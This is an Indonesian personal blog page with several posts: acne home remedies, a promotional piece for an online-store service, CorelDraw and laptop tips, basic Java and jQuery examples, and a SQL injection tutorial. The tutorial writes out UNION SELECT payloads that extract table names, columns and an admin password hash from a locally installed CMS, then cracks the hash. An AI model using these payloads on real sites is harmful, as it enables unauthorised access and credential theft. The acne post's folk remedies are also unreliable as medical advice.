Dapatkan berbagai informasi, fenomena alam, keajaiban alam, desain grafis, pemrograman Java maupun Vb.Net disini, kritik dan saran dapat anda sampaikan melalui kotak komentar... jadikan internet sebagai gudang ilmu...

Selasa, 02 Juni 2015

Cara Ampuh Menghilangkan Jerawat Beserta Bekasnya

Masalah jerawat memang menjai masalah yang menjengkelkan, terutama bagi kaum wanita, jerawat memang membuat kita tidak percaya diri saat maju mempresentasikan tugas sekolah atau kuliah kita.
Buakan hanya itu, setelah jerawat kita sembuh muncul masalah baru, yaitu bekasnya yang mengganggu, lalu bagai mana kita menyembuhkan jerawat beserta bekas bekasnya?
Untuk saat ini memang banyak produk perawatan wajah yang menjanjikan wajah anda terbebas dari jerawat, namun penggunaan bahan kimia yang terlalu sering di wajah tidak akan baik untuk kita, berikut ini cara ampuh menghilangkan jerawat beserta bekas bekasnya dengan menggunakan bahan bahan yang alami.

Cara Mengatasi Jerawat
  • Tidur yang cukup  
Tidur yang cukup juga bisa membantu mencegah jerawat, siapa sangka kurang tidur bisa menimbulkan jerawat, bukan hanya jerawat penyakit yang lainnya juga akan mengintai tubuh anda. tidur yang cukup membuat metabolisme tubuh menjadi teratur, sehingga jerawat dan bekasnya akan memudar secara perlahan.
  • Tidak memecahkan jerawat 
Ini kebiasaan yang sulit di tangani, kalau ada jerawat, berasa tangan kita ini sangat gatal ingin memecahkannya, namun itu bukan cara yang benar, memecahkan jerawat sebelum waktu jerawatnya pecah membuat jerawat anda menyebar bertambah banyak dan bekasnya sulit hilang apalagi saat tangan anda kotor, tentu kuman kuman di tangan akan berpindah ke wajah kita.
  • Membersihkan wajah secara teratur 
Membersihkan wajah secara teratur sudah menjadi keharusan, setiap pulang dari berpergian sebaiknya anda mencuci wajah anda dengan air yang bersih. dengan mencuci muka maka kuman dan kotoran di wajah anda akan hilang.
Bahan Alami Untuk Menghilangkan Jerawat Dan Cara Pemakaiannya
  • Lidah buaya
 Kupas daun lidah buaya, ambil isi dan jelnya, lalu gunakan jel lidah buaya tersebut sebagai masker wajah, diamkan selama 10-15 menit lalu bilas menggunakan air bersih.

  • Air jeruk nipis
Ambil jeruk nipis secukupnya, lalu peras dan oleskan ke bagian jerawat dan bekasnya di wajah anda, diamkan selama kurang lebih 15 menit dan bilas menggunakan air yang bersih. pemakaian pertama akan terasa sedikit perih pada wajah anda, itu adalah efek dari air jeruk nipis untuk menghilangkan rasa gatal dan bekas jerawat pada wajah anda.


  • Putih telur
Ambil satu butir telur, ambil putihnya saja kocok sebentar, lalu oleskan pada wajah berjerawat anda, diamkan selama kurang lebih 15 menit, lalu cuci dengan air bersih.


  • Mentimun
Mentimun merupakan jenis sayuran yang mengandung banyak air yang jika dikonsumsi, dapat mencegah dehidrasi. Selain itu mentimun mengandung zat seperti : Vitamin B, Vitamin C, zat besi, dll, yang juga baik untuk kesehatan kulit. Cara penggunaannya, ambil satu buah mentimun, iris tipis menjadi beberapa lembar, lalu tempelkan ke wajah, diamkan selama 10-15 menit.

  • Minum Air putih 
Tahukah anda jika sekitar 70% dari tubuh kita adalah air? Maka dari itu, tak heran jika banyak orang yang menyarankan untuk mengkonsumsi air putih yang cukup. Air putih ini dapat melembabkan kulit wajah anda, dengan demikian bekas jerawat tidak akan menyebar kemana – mana.


Itulah beberapa cara ampuh menghilangkan jerawat beserta bekas bekasnya, sampai ketemu lagi di tips tips lainnya.

Senin, 14 April 2014

Mengetahui Username dan Password Admin Website

selamat malam, saat ini saya akan menjelaskan sebuah cara untuk meng-hack sebuah website.
cara ini disebut dengan "SQL INJECTION". cara ini sangat mudah untuk pemula seperti saya.

apa yang diperlukan?

  • Yet Another CMS sebagai target percobaan (Yet Another CMS)
  • xampp
  • text editor
  • web browser
setelah didownload cmsnya anda extract ke folder "\opt\lampp\htdocs\Hack\ (Ubuntu)
"c:\xampp\htdocs\Hack" (Windows).
berikut langkah langkahnya:
  1. buka file constants.php pada folder "Hack\includes\constants.php" menggunakan text editor seperti bluefish editor atau notepad++.
  2. edit di bagian berikut.
  3. buka phpmyadmin di web browser anda, kemudian masuk ke database hack, jika belum ada silahkan di buat terlebih dahulu. kemudian import database yang telah di sediakan cms pada folder "database\final_db.sql".
  4. buka web browser kembali lalu buka "http://localhost/Hack".
sekarang kita telah siap melakukan serangan ke website tersebut.

1. disini kita akan mencari dan menemukan celah keamanannya dengan melakukan test standa.
  • http://localhost/Hack/index.php?page=1
  • http://localhost/Hack/index.php?page=2
  • http://localhost/Hack/index.php?page=3
lalu kita lakukan test pada salah satu parameternya.

  • http://localhost/Hack/index.php?page=-1
dengan menambahkan tanda min (-) di belakang angka id.

2. mencari jumlah kolom dengan menggukan perintah "order by".
  • order by 1--
  • order by 2--
  • order by 3--
  • dst
lakukan cara itu secara terus menerus.

setelah mendapatka pesan error  seperti gambar di bawah!, maka kita telah mengetahui jumlah kolom dari databsenya berita adalah 6 karena saat meminta untuk ORDER BY kolom ke 7, terjadi error dengan kata lain, kolom ke 7 itu tidak ada.

3. setelah menemukan jumlah kolom, kini tugas selanjutnya menemukan angka error sebagai celah untuk mengintip ke isi database. 


dari proses tersebut, maka akan muncul angka error adalah 3 dan 6.


4. selanjutnya kita akan mencari informasi dasar database. karena website target memiliki dua angka error, maka kita akan mencari dua informasi sekaligus, yaitu versi MySQL dan nama databasenya.
berikit parameter yang digunakan:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,version(),4,5,database()--"

maka kita mendapatkan hasil:


dari gambar diatas kita mendapatkan nama database adalah "hack" dan versi MySQL-nya adalah 5.6.12.

5. selanjutnya kita harus mencari nama-nama tabel dengan melakukan "group" pada nama nama tabel di dalam database "hack" dengan menggunakan perintah "group_concat".

"http://localhost/Hack/index.php?page=-1 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--".


maka akan dapat hasil berikut:


pada gambar diatas kita menemukan nama nama tabelnya yaitu "pages", "subjects" dan "users".

6. selanjutnya untuk membuka isi dari tabel tersebut, kita akan menterjemahkan nama tabelnya yaitu "users" ke dalam format heksadesimal. (ascii to hexa).


setelah di terjemahkan maka kita akan mendapat angka heksadesimalnya yaitu "7573657273".

masukkan parameter berikut:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x7573657273--"

dari parameter di atas dapat hasil sebagai berikut:


dari gambar diatas, kita telah menemukan nama kolom dari tabel user, yaitu id, username, hashed_password.

7. berikutnya kita akan melihat isi dari kolom suatu tabelnya dengan langkah akhir adalah membuka isi kolom yang kita anggap ada infrmasi login adminnya.

berikut parameternya:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,concat_ws(0x3a, username, hashed_password),4,5,6 from users--"


dari gambar diata kita telah mengetahui username dan password adminnya.
username : farockrdn
password : f57b455e08f1daebf152a1e07cdd6c1d831993d6

berikutnya kita akan melakukan deskripsi hash passwordnya dengan link penyedia MD5Decrypter.



dari gambar diatas terdapat bahwa password admin adalah "forgetful".

8. mencari page login adminnya, setelah kalian ketemu masukkan username dan password yang telah kita dapati sebelumnya.


selamat mencoba.


referensi: 100% sukses hacking website

Jumat, 13 September 2013

Membuat Hotspot Tanpa Software (CMD)

Selamat pagi dunia...
Sudah lama tidak ngepost lagi, sambil nunggu waktu kuliah mending aku share info yang menarik untuk kalian semua. Saat aku menggunakan SmartPhone aku bingung terhadap paket internetnya, antara harus beli paket modem atau paket untuk smartphone, yang namanya mahasiswa kan slalu nyekak atau bahasa vicky nya itu labil ekonomi.. :D apa lagi uang gaji belum di terima. aku mencoba gunain software serperti conect*** namun saat start hotspotnya laptop langsung kena bluescreen, nah aku mulai bingung, tak menyerah, aku cari cara lain. setelah kultum ke mbah google aku nemuin metodenya, dari metode ini lah aku coba buat sendiri koneksi hotspot hanya menggunakan CMD. oke langsung saja menuju ke TEKAPE..

1. Run CMD as Admin
2. ketikkan "netsh wlan set hostednetwork ssid=nama_wifi key=pass_anda"
3. ketikkan "netsh wlan start hostednetwork"
4. buka network & sharing center
5. klik pada koneksi yang saat ini kalian gunakan
6. klik properties, lalu buka pada tab sharing
7. centang pada allow other network bla bla bla bla......
8. pilih local area connection* 30 lalu klik ok
sekarang kalian sudah bisa menghubungkan smartphone atau device lainnya ke hotspot yang telah kalian buat tadi. gimana infonya bagus gak? walaupun gak bagus tapi tetap keep smile. :)

Sabtu, 23 Maret 2013

Solusi Mudah Membuat Toko Online


halo sobat informasi kita, di hari ini saya akan memberikan tips untuk membuat toko online.
pasti kalian sudah pada taukan apa itu toko online, ya toko online adalah sarana dimana kita bisa berbelanja melalui website atau blog, seperti halnya toko nyata, toko online juga memiliki produk atau barang yang dijual, namun dipajang dalam bentuk gambar, dan juga memiliki cara pembayaran dan pengiriman melalui sarana yang tersedia. karena toko online menggunakan website atau blog, toko online dapat dilihat atau di akses di mana saja anda berada, tidak tebatas oleh jarak.
untuk anda yang memiliki toko atau produk sendiri, anda dapat memuat toko online anda dengan mudah dan cepat. hanya membutuhkan waktu +- 20 detik saja, langsung saja kunjungi Jejualan.com

dalam membuat website atau toko online kita harus memperhatikan hal berikut:

  • Memperhatikan Struktur Menu
Pada Jejualan.com, anda bisa memilih tema yang bagus untuk website anda, dengan susunan menu yang baik.
  • Desain
Supaya pengunjung anda betah dan tidak bosan dengan tampilan toko online anda, anda harus membuat desain website yang menarik dan enak di lihat, namun jangan kawatir di jejualan.com sudah tersedia segala desainnya dan temanya.
  • Pemasaran
harus ada pemaaran yang efisien dari toko online tersebut, hal ini tidak perlu di kawatirkan juga, karena Jejualan.com sudah menyediakan SOE, Marketing Tools dan Ratusan Fitur Ecommerce.


beberapa fitur dari Jejualan.com adalah sebagai berikut:



SMS Report

SMS otomatis terkirim ke nomor ponselmu dan ponsel tokomu setiap ada transaksi.







Layanan 24 Jam

Customer support jejualan siap melayani apapun kebutuhanmu.








Halaman Pertama Google

Toko onlinemu akan berada di halaman pertama hasil pencarian google dengan teknologi SEO jejualan.





Marketing Tools

Toko onlinemu akan lebih sukses dipromosikan dengan marketing tools, seperti kirim newsletter gratis, kampanye promo, kode kupon diskon, dan masih banyak  lagi.





Konsultasai Langsung Dengan Pakar Ecommerce

Pakar Ecommerce akan menganalisa dan memberikan masukan untuk memastikan strategi penjualan di tokomu berhasil.






Terima Bayaran dari Manapun

Tokomu bisa menerima pembayaran melalui transfer bank, Paypal & kartu kredit.








Ongkos Kirim Otomatis

Semua data ongkos kirim dari JNE dan Pos Indonesia akan otomatis tersedia di tokomu.








Ratusan Fitur Ecommerce

Daftar sekarang dan dapatkan ratusan fitur ecommerce tercanggih lainnya.








Kalau bicarain soal harga anda jangan kawatir, di Jejualan.com anda bisa memilih dua paket yaitu paket Gold dan paket Platinum.

1. Paket Gold
jika anda memilih paket Gold, anda hanya membayar 60ribu/bulan.
di paket Gold, anda dapat memasang maksimal 500 produk anda, gratis domain (.com/ .net/ .org), ratusan fitur Ecommerce tercanggih, gratis 2500 newsletter/bulan, fitur kupon belanja dan fitur SEO.

2. Paket Platinum
namun jika anda memilih paket Platinum, anda dapat membayar 200ribu/bulan.
di paket Platinum, anda bisa memasang semua produk anda tanpa ada batasannya, gratis domain (.com/ .net/ .org), ratusan fitur Ecommerce tercanggih, gratis 5000 newsletter/bulan, fitur kupon belanja, fitur SEO, white label dan gratis desain logo.

gimana sobat Informasi Kita? pada tertarikkan untuk membuat toko online sendiri? langsung aja daftar di bawah ini.

Coba Sekarang Gratis 15 Hari


Beberapa Keuntungan Anda Memilih Jejualan.com
  • Bisa Upgrade ataupun Downgrade paketmu kapan saja.
  • Dapat diskon 10% jika berlangganan langsung satu tahun.
  • Bisa menggunakan nama domainmu sendiri.
  • dan tentunya gratis 15 hari jika anda mendaftar sekarang.


Berikut Ini Beberapa Testimoninya yang Langsung diambil dari Situs Jejualan.com
  • ebagai seorang desainer rumah, saya ingin usaha saya dikenal dan salah satunya melalui media online. dan alhamdulillah jejualan.com memberikan kemudaha untuk itu..
    Ajeng Rahayu, desainer teras rumah
  • kalo menurut bunda, jejualan.com bagus sekali.. mereka memberikan kemudahan bagi pengusaha untuk mengembangkan usahanya di dunia maya
    bunda, bunda pengusaha
  • sudah 3bulan pakai jejualan. websitenya bagus... seonya lumayan aku review seo webku 80% .. wooww.. padahal cuma pasang kata kunci.. pikirku \\\"script webnya bagus dimata google\\\"

    penjualan naik 30% dari web sebelum pakai jejualan.

    jgn ragu deh... pakai jejualan aja.

    thanks jejualan ^_^ paket goldnya tambahin donk untuk input produknya 1000deh mnimal.. atau paket platinumnya jgn jauh\\\" harganya. hehe

    www.kazoustore.com
    faruqi rohman, swasta



Senin, 04 Februari 2013

Pria Tekno Seksual Lebih Digilai Wanita




Pria-pria metroseksual—mereka yang selalu tampil resik dan wangi karena cermat merawat tubuh—dulu lebih digemari kaum perempuan. Tetapi, pria metroseksual saat ini mungkin dianggap sudah tidak "menantang" lagi. Penelitian terbaru dari Research1 yang bekerja sama dengan situs peng-upgrade komputerCrucial.com menunjukkan, pria-pria tekno-seksual kini lebih digemari.
Yang dimaksud dengan pria tekno-seksual adalah mereka yang mampu menavigasi dunia smartphone dan tablet, mengerti teknologi, termasuk tahu bagaimana memperbaiki dan meng-upgrade perangkatnya. Kemampuan itulah yang amat dikagumi dua pertiga perempuan yang ikut ambil bagian dalam survei. Pria tekno-seksual dianggap lebih menarik daripada pria yang gemar mengutak-atik mobil, meski selisihnya tipis.

Tren pria tekno-seksual ini tampaknya semakin bertumbuh semenjak kita semakin bergantung pada teknologi dalam menjalankan kehidupan sehari-hari. Sebanyak 60 persen orang yang disurvei berharap mereka lebih menguasai teknologi ketimbang mobil (33 persen), properti (28 persen), musik (17 persen), fashion (14 persen), atau olahraga (11 persen). Kekaguman akan sosok pria tekno-seksual dipicu pula oleh kepopuleran si pendiri Facebook, Mark Zuckerberg.

"Teknologi memengaruhi kehidupan setiap orang sehingga tidak mengherankan kalau orang berharap mereka memiliki pemahaman yang lebih baik mengenai teknologi, dan bagaimana memperbaiki atau meng-upgrade-nya ketika (gadget atau komputer) tidak bekerja maksimal," papar Roddy McLean, pakar upgrade komputer dariCrucial.com.

Padahal, menurut McLean, teknologi tidak sesulit atau se-membingungkan yang dikira orang. Meng-upgrade hard drive atau memori komputer kedengarannya sangat "techie", padahal sebenarnya sangat mudah dan cepat dilakukan. "Asal, Anda mengikuti petunjuk yang benar," tambahnya.

Tampaknya, kaum pria sendiri sadar bahwa kemampuan mengeksplorasi teknologi akan membuat lawan jenis mereka terkesan. Survei ini juga menunjukkan, hampir 40 persen pria mengaku sering melebih-lebihkan kecakapan mereka dalam hal teknologi (seperti kemampuan memperbaiki dan meng-upgrade gadget, komputer, dan laptop) untuk menarik perhatian perempuan.

Untungnya, perempuan saat ini juga tidak mudah terkecoh dengan tingkah laku pria yang sok tekno-seksual. Mereka tahu pria yang sungguh-sungguh menguasai teknologi, atau mereka yang hanya membual tanpa bisa membuktikan kemampuannya. Terbukti, 80 persen perempuan tak pernah memercayai mereka yang suka "no action-talk only". Sebanyak 81 persen dari perempuan yang disurvei pernah memakai komputer atau laptop yang lemot, tetapi pria-pria yang mereka kenal tak mampu membuktikan keahlian teknologi yang tergolong sederhana, seperti meng-upgradememori.

Selasa, 29 Januari 2013

Membuat Logo AMD Menggunakan CorelDraw

hallohhhh semua..
di hari ini saya akan memberitahukan bagai mana cara membuat logo amd menggunakan corel draw.
pasti kalian sudah tau bukan apa itu amd? ya, amd adalah perusahaan pembuat prosesor, brand prosesor ini menjadi lawan beratnya Intel dalam memproduksi prosesor, dengan kualitas yang hampir sama dan harga yang jauh lebih murah.
tidak usah berlama lama lagi, langsung saja masuk kelangkah pertama.

1. Buat file baru, file >> new.
2. Buat 2 buah persegi seperti yang tampak pada gambar di bawah.


3. Geser persegi berwarna putih, seperti gambar di bawah. lalu klik Back minus front, persegi tersebut akan menjadi persegi 3


4. copy persegi tiga yang berwarna hijau lalu paste, buat lagi persegi 4 lalu letakkan pada persegi 3 yg pertama, buat 2 buah persegi lagi lalu letakkan pada persegi 3 yang ke 2. seperti yang tampak pada gambar di bawah. jangan lupa pada persegi 3 yang kedua hilangkan 2 buah persegi panjangnya dengan mengklik Back minus front.


5. jika suda, geserkan persegi 3 yang ke dua pada persegi 3 yang utama.



 6. klik text tool untuk memberi text AMD-nya.


nah sampai di sini dulu tutorial CorelDrawnya, terimakasih untuk yang sudah membaca. ^^

Senin, 28 Januari 2013

Mencegah Fan Laptop Dari Debu

dihari ini saya akan memberikan tips agar fan/kipa laptop terbebas dari debu yg membandel.
bahan yg di perlukan:
  1. lakban/isolasi.
  2. jaring halus/bisa juga menggunakan kertas untuk mengalas CD/DVD.
Alat:
  1. Gunting.
langkah 1.

guntung jaring mengikuti ukuran fentilasi udara di laptop.


langkah ke 2:
potong lakban/isolasi, tempelkan ke setiap sisi jaring dan body laptop.

nah sekarang laptop anda dijamin bebas dari debu.

Rabu, 19 Desember 2012

Tutorial Java Sederhana (String Variable)


Variable sering dijumpai dalam bahasa pemograman variable ini digunakan untuk menyimpan data yang bersifat sementara baik jenis string, integer, array dll. Variable dalam script PHP dinyatakan dengan tanda $ didepan nama variable.
Nama variable dapat berupa huruf, angka maupun garis bawah. Namun dalam penulisannya, variable harus harus diawali dengan huruf atau (_) garis bawah, kemudian diikuti huruf atau angka. Penulisan variable dengan karakter awal angka tidak diperbolehkan.

Contoh:

 /**
 *
 * @author Farockrdn
 */
public class Latihan {

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        String depan;
        String belakang;
      
        depan ="Farock";
        belakang ="Ramdani";
      
        System.out.println("nama saya : " +depan+ " " +belakang);
    }
}

Output:




Tutorial Java Sederhana (Array)

udah lama tidak mengupdate blog ini. ^^
Array adalah kumpulan data yang memiliki tipe data dan jumlah elemen yang tetap (tidak bisa ditambah/dikurangi). Array pada Java adalah sebuah objek, maka harus dideklarasikan menggunakan kata kunci new. Tiap data pada array disebut element, dan masing-masing element dapat diakses menggunakan index yang berupa angka. Index dimulai dari 0 sampai jumlah element – 1.
berikut contoh array pada java.

/**
 *
 * @author Farockrdn
 */
public class Latihan {

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        int[] nilai;
        nilai = new int[4];
       
        nilai[0] = 25;
        nilai[1] = 30;
        nilai[2] = 43;
        nilai[3] = 71;
       
        System.out.println("niali : " +nilai[2]);
    }
}

script di atas mendeklarasikan variable yang terdapat pada variable ke-3 yang berisi nilai 43.


Jumat, 31 Agustus 2012

Membuat Tombol Show/Hide Text Menggunakan JQuery



KODE:

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="http://informasi-kita.googlecode.com/files/jquery.js"></script>
<script type="text/javascript">
$(document).ready(function(){
  $("button").click(function(){
    $("p").toggle(1000);
  });
});
</script>
</head>
<body>

<button>Klik</button>
<p>Letakkan paragraf anda di sini</p>
<p>Letakkan deskripsi di sini</p>
</body>
</html>


HASIL:











Letakkan paragraf anda di sini
Letakkan deskripsi di sini